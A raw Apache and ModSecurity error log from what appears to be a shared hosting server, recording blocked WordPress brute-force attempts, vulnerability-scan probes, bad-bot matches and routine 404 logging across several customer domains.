[Tue May 26 16:15:27.597278 2026] [security2:error] [pid 782634:tid 782889] [client 14.245.222.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5x__P9qBfeb1w76ZJAQAAAH0"]
[Tue May 26 16:15:27.877986 2026] [security2:error] [pid 782634:tid 782793] [client 176.36.146.80:63491] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "176.36.146.80" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV5x__P9qBfeb1w76ZJDwAAAB0"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 16:15:28.642568 2026] [security2:error] [pid 782634:tid 782876] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5yP_P9qBfeb1w76ZJFQAAAHA"]
[Tue May 26 16:15:28.907915 2026] [security2:error] [pid 782634:tid 782843] [client 66.249.64.164:44867] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV5x__P9qBfeb1w76ZJDgAAAE8"], referer: http://doyecpa.com/prizes/284877945%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 16:15:31.219105 2026] [security2:error] [pid 782634:tid 782768] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5yv_P9qBfeb1w76ZJUAAAAAQ"]
[Tue May 26 16:15:31.903125 2026] [security2:error] [pid 782634:tid 782828] [client 103.44.52.196:40010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5y__P9qBfeb1w76ZJbwAAAEA"]
[Tue May 26 16:15:31.903250 2026] [security2:error] [pid 782634:tid 782828] [client 103.44.52.196:40010] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5y__P9qBfeb1w76ZJbwAAAEA"]
[Tue May 26 16:15:33.150591 2026] [security2:error] [pid 782634:tid 782855] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5zP_P9qBfeb1w76ZJgAAAAFs"]
[Tue May 26 16:15:33.683450 2026] [security2:error] [pid 782634:tid 782830] [client 138.219.122.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5zf_P9qBfeb1w76ZJjQAAAEI"], referer: https://www.anujtradingco.com/
[Tue May 26 16:15:34.216837 2026] [security2:error] [pid 782634:tid 782814] [client 106.219.85.83:24511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5zv_P9qBfeb1w76ZJlwAAADI"]
[Tue May 26 16:15:34.216985 2026] [security2:error] [pid 782634:tid 782814] [client 106.219.85.83:24511] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5zv_P9qBfeb1w76ZJlwAAADI"]
[Tue May 26 16:15:34.568686 2026] [security2:error] [pid 782634:tid 782883] [client 138.219.122.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5zv_P9qBfeb1w76ZJqQAAAHc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467072&moderation-hash=72f44dbcdc0c737e3cf7427fd1cc1d45
[Tue May 26 16:15:35.542020 2026] [security2:error] [pid 782634:tid 782791] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5z__P9qBfeb1w76ZJuQAAABs"]
[Tue May 26 16:15:37.031060 2026] [security2:error] [pid 782634:tid 782798] [client 138.219.122.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV50P_P9qBfeb1w76ZJ5gAAACI"], referer: https://anujtradingco.com
[Tue May 26 16:15:37.441576 2026] [security2:error] [pid 782634:tid 782780] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV50f_P9qBfeb1w76ZJ6gAAABA"]
[Tue May 26 16:15:39.303215 2026] [security2:error] [pid 782634:tid 782710] [remote 52.167.144.195:8015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2025a-KaizenServApt.php"] [unique_id "ahV50__P9qBfeb1w76ZKFgAAC0s"]
[Tue May 26 16:15:39.345125 2026] [security2:error] [pid 782634:tid 782810] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV50v_P9qBfeb1w76ZKEgAAAC4"]
[Tue May 26 16:15:40.857194 2026] [security2:error] [pid 782634:tid 782771] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV51P_P9qBfeb1w76ZKLwAAAAc"]
[Tue May 26 16:15:42.530800 2026] [security2:error] [pid 782634:tid 782782] [client 103.44.52.196:49970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV51v_P9qBfeb1w76ZKXAAAABI"]
[Tue May 26 16:15:42.530999 2026] [security2:error] [pid 782634:tid 782782] [client 103.44.52.196:49970] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV51v_P9qBfeb1w76ZKXAAAABI"]
[Tue May 26 16:15:43.446471 2026] [security2:error] [pid 782634:tid 782847] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV51__P9qBfeb1w76ZKbAAAAFM"]
[Tue May 26 16:15:44.763673 2026] [security2:error] [pid 782634:tid 782859] [client 106.219.85.83:18341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV52P_P9qBfeb1w76ZKgwAAAF8"]
[Tue May 26 16:15:44.763769 2026] [security2:error] [pid 782634:tid 782859] [client 106.219.85.83:18341] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV52P_P9qBfeb1w76ZKgwAAAF8"]
[Tue May 26 16:15:44.813182 2026] [security2:error] [pid 782634:tid 782708] [remote 5.42.158.148:51788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahV52P_P9qBfeb1w76ZKfAAAQ0k"]
[Tue May 26 16:15:45.133391 2026] [security2:error] [pid 782634:tid 782881] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV52P_P9qBfeb1w76ZKggAAAHU"]
[Tue May 26 16:15:47.044455 2026] [security2:error] [pid 782634:tid 782847] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV52v_P9qBfeb1w76ZKrwAAAFM"]
[Tue May 26 16:15:49.718530 2026] [security2:error] [pid 782634:tid 782773] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV53f_P9qBfeb1w76ZK2gAAAAk"]
[Tue May 26 16:15:51.011840 2026] [security2:error] [pid 782634:tid 782744] [remote 74.7.241.58:44244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV53__P9qBfeb1w76ZLBAAAc20"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:15:51.716481 2026] [security2:error] [pid 782634:tid 782813] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV53__P9qBfeb1w76ZLDQAAADE"]
[Tue May 26 16:15:51.939508 2026] [security2:error] [pid 782634:tid 782868] [client 77.68.83.86:51399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/images/images/cache.php"] [unique_id "ahV53__P9qBfeb1w76ZLFwAAAGg"], referer: www.google.com
[Tue May 26 16:15:53.362131 2026] [security2:error] [pid 782634:tid 782878] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV54P_P9qBfeb1w76ZLKwAAAHI"]
[Tue May 26 16:15:53.933900 2026] [security2:error] [pid 782634:tid 782809] [client 113.184.20.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV54f_P9qBfeb1w76ZLQQAAAC0"]
[Tue May 26 16:15:55.521885 2026] [security2:error] [pid 782634:tid 782874] [client 106.219.85.83:23099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV54__P9qBfeb1w76ZLYwAAAG4"]
[Tue May 26 16:15:55.522024 2026] [security2:error] [pid 782634:tid 782874] [client 106.219.85.83:23099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV54__P9qBfeb1w76ZLYwAAAG4"]
[Tue May 26 16:15:56.598946 2026] [security2:error] [pid 782634:tid 782757] [remote 82.223.24.195:57722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahV55P_P9qBfeb1w76ZLfgAALXo"]
[Tue May 26 16:15:57.062375 2026] [security2:error] [pid 782634:tid 782646] [remote 178.156.182.155:49224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV55P_P9qBfeb1w76ZLiAAAJAs"]
[Tue May 26 16:15:58.033248 2026] [security2:error] [pid 782634:tid 782836] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV55f_P9qBfeb1w76ZLlAAAAEg"]
[Tue May 26 16:15:58.803184 2026] [security2:error] [pid 782634:tid 782858] [client 77.68.83.86:60933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/images/images/cache.php"] [unique_id "ahV55v_P9qBfeb1w76ZLswAAAF4"], referer: www.google.com
[Tue May 26 16:15:59.853160 2026] [security2:error] [pid 782634:tid 782767] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV55__P9qBfeb1w76ZLwQAAAAM"]
[Tue May 26 16:15:59.992369 2026] [security2:error] [pid 782634:tid 782778] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV55__P9qBfeb1w76ZLxwAAAA4"]
[Tue May 26 16:16:02.152855 2026] [security2:error] [pid 782634:tid 782818] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV56f_P9qBfeb1w76ZL9QAAADY"]
[Tue May 26 16:16:04.251659 2026] [security2:error] [pid 782634:tid 782803] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV56__P9qBfeb1w76ZMKgAAACc"]
[Tue May 26 16:16:04.455270 2026] [security2:error] [pid 782634:tid 782784] [client 103.44.52.196:45376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV57P_P9qBfeb1w76ZMNQAAABQ"]
[Tue May 26 16:16:04.455384 2026] [security2:error] [pid 782634:tid 782784] [client 103.44.52.196:45376] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV57P_P9qBfeb1w76ZMNQAAABQ"]
[Tue May 26 16:16:05.895289 2026] [security2:error] [pid 782634:tid 782783] [client 106.219.85.83:5918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV57f_P9qBfeb1w76ZMVgAAABM"]
[Tue May 26 16:16:05.895620 2026] [security2:error] [pid 782634:tid 782783] [client 106.219.85.83:5918] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV57f_P9qBfeb1w76ZMVgAAABM"]
[Tue May 26 16:16:06.628526 2026] [security2:error] [pid 782634:tid 782837] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV57v_P9qBfeb1w76ZMXAAAAEk"]
[Tue May 26 16:16:07.081247 2026] [proxy:warn] [pid 782634:tid 782767] [client 80.82.77.202:57540] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 16:16:07.081291 2026] [proxy:error] [pid 782634:tid 782767] (70014)End of file found: [client 80.82.77.202:57540] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 80.82.77.202 ()
[Tue May 26 16:16:07.721819 2026] [proxy:warn] [pid 782634:tid 782859] [client 80.82.77.202:57558] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 16:16:07.721848 2026] [proxy:error] [pid 782634:tid 782859] (70014)End of file found: [client 80.82.77.202:57558] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 80.82.77.202 ()
[Tue May 26 16:16:09.739031 2026] [security2:error] [pid 782634:tid 782769] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV58f_P9qBfeb1w76ZMmgAAAAU"]
[Tue May 26 16:16:10.027905 2026] [security2:error] [pid 782634:tid 782858] [client 20.192.3.167:9662] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "obinnawrites.com"] [uri "/1.php"] [unique_id "ahV58v_P9qBfeb1w76ZMoQAAAF4"]
[Tue May 26 16:16:10.085568 2026] [security2:error] [pid 782634:tid 782858] [client 20.192.3.167:9662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/1.php"] [unique_id "ahV58v_P9qBfeb1w76ZMoQAAAF4"]
[Tue May 26 16:16:11.014190 2026] [security2:error] [pid 782634:tid 782799] [client 20.192.3.167:2368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/2.php"] [unique_id "ahV58__P9qBfeb1w76ZMsQAAACM"]
[Tue May 26 16:16:11.826160 2026] [security2:error] [pid 782634:tid 782814] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV58__P9qBfeb1w76ZMvQAAADI"]
[Tue May 26 16:16:11.925321 2026] [security2:error] [pid 782634:tid 782879] [client 20.192.3.167:9947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/7.php"] [unique_id "ahV58__P9qBfeb1w76ZMwwAAAHM"]
[Tue May 26 16:16:12.825733 2026] [security2:error] [pid 782634:tid 782848] [client 20.192.3.167:3675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/10.php"] [unique_id "ahV59P_P9qBfeb1w76ZMzQAAAFQ"]
[Tue May 26 16:16:13.818350 2026] [security2:error] [pid 782634:tid 782862] [client 20.192.3.167:12376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/13.php"] [unique_id "ahV59f_P9qBfeb1w76ZM4AAAAGI"]
[Tue May 26 16:16:14.003019 2026] [security2:error] [pid 782634:tid 782770] [client 128.140.106.114:29952] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV59f_P9qBfeb1w76ZM2wAAAAY"], referer: https://thegoodsporting.com
[Tue May 26 16:16:14.800511 2026] [security2:error] [pid 782634:tid 782829] [client 20.192.3.167:11815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/100.php"] [unique_id "ahV59v_P9qBfeb1w76ZM8wAAAEE"]
[Tue May 26 16:16:15.194955 2026] [security2:error] [pid 782634:tid 782811] [client 103.44.52.196:41918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV59__P9qBfeb1w76ZM_QAAAC8"]
[Tue May 26 16:16:15.195070 2026] [security2:error] [pid 782634:tid 782811] [client 103.44.52.196:41918] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV59__P9qBfeb1w76ZM_QAAAC8"]
[Tue May 26 16:16:15.628182 2026] [security2:error] [pid 782634:tid 782814] [client 20.192.3.167:1086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/222.php"] [unique_id "ahV59__P9qBfeb1w76ZNBgAAADI"]
[Tue May 26 16:16:16.227534 2026] [security2:error] [pid 782634:tid 782837] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV59__P9qBfeb1w76ZNDAAAAEk"]
[Tue May 26 16:16:16.527085 2026] [security2:error] [pid 782634:tid 782769] [client 106.219.85.83:27990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5-P_P9qBfeb1w76ZNGgAAAAU"]
[Tue May 26 16:16:16.527338 2026] [security2:error] [pid 782634:tid 782769] [client 106.219.85.83:27990] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5-P_P9qBfeb1w76ZNGgAAAAU"]
[Tue May 26 16:16:16.544160 2026] [security2:error] [pid 782634:tid 782801] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5-P_P9qBfeb1w76ZNGAAAACU"]
